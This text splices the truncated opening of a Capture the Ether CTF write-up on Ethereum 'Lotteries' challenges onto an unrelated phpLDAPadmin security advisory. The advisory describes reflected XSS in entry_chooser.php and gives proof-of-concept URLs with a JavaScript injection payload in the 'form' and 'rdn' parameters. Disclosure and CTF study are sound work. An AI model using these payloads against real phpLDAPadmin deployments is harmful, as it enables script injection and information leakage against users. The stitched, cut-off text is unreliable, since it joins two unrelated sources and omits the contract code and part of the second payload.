Capture the Ether is a "Capture the Flag" style game in which you hack Ethereum smart contracts to learn about security. Spoiler Alert ! In this write-up, I will go through the first four challenges in the category labeled "Lotteries". Each of these challenges has its own difficulty level and reward points. Basically you can solve them by "guessing?" the right value of a variable in a given smart contract. Guess the number The smart contract for this challenge looks like this: It has three functions : GuessTheNumberChallenge() : a payable constructor that tells you how much Ether is required when deploying the smart contract. isComplete() : it returns true when the smart contract's balance is equal to 0. guess(uint8 n) : It takes a uint8 as an argument and compares it with the variable declared in line 4. If the numbers are equal, you will have your Ethers sent back to your address. Note that this function is payable and req
Software Description phpLDAPadmin is an web-based LDAP adminstration interface for viewing and manipulating LDAP information. Vulnerability Description $request['form'] and $request['rdn'] parameters in file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/Javascript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage as it is demonstrated in this PoC video. Proof of Concept (PoC) XSS via the 'form' parameter: http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass): http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%